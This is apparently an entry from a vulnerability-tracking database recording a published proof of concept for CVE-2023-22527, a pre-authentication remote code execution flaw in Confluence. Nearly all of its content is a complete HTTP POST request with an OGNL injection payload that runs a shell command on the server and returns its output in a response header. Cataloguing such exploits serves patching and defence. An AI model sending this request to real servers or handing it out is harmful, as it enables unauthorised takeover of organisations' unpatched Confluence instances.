{"uuid": "7ce312b4-a392-422a-9c47-ac2be0a80325", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2023-22527", "type": "published-proof-of-concept", "source": "https://t.me/poxek/3599", "content": "Confluence Pre-Auth Remote Code Execution via OGNL Injection\nCVE-2023-22527\n\nPoC:\n\n\nPOST /template/aui/text-inline.vm HTTP/1.1\nHost: localhost:8090\nAccept-Encoding: gzip, deflate, br\nAccept: */*\nAccept-Language: en-US;q=0.9,en;q=0.8\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36\nConnection: close\nCache-Control: max-age=0\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 285\n\nlabel=\\u0027%2b#request\\u005b\\u0027.KEY_velocity.struts2.context\\u0027\\u005d.internalGet(\\u0027ognl\\u0027).findValue(#parameters.x,{})%2b\\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({\"id\"}))\n\n#Confluence\n\n>", "creation_timestamp": "2024-01-22T13:05:53.000000Z"}